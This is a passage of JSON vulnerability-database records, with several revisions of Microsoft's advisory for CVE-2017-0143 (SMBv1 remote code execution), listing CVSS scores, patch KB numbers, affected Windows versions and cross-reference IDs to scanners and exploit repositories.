"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4013198", "KB3212646", "KB4012216", "KB4012606", "KB4012214", "KB3210720", "KBMS16-110, 3187754", "KB4012213", "KB3205409", "KB4012212", "KB4013429", "KB3177186", "KB4012215", "KB4012217", "KB4012598", "KB3213986", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T18:44:02", "differentElements": ["msAffectedSoftware"], "edition": 54}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T20:55:04", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4013198", "KB3212646", "KB4012216", "KB4012606", "KB4012214", "KB3210720", "KBMS16-110, 3187754", "KB4012213", "KB3205409", "KB4012212", "KB4013429", "KB3177186", "KB4012215", "KB4012217", "KB4012598", "KB3213986", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T20:55:04", "differentElements": ["msAffectedSoftware"], "edition": 55}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T22:48:26", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012212", "KB4012215", "KB3210720", "KB4012598", "KB4012213", "KB4013429", "KB3205401", "KB4012606", "KB3213986", "KB3210721", "KB3205409", "KB4013198", "KB4012214", "KB3177186", "KB4012216", "KB3212646", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": 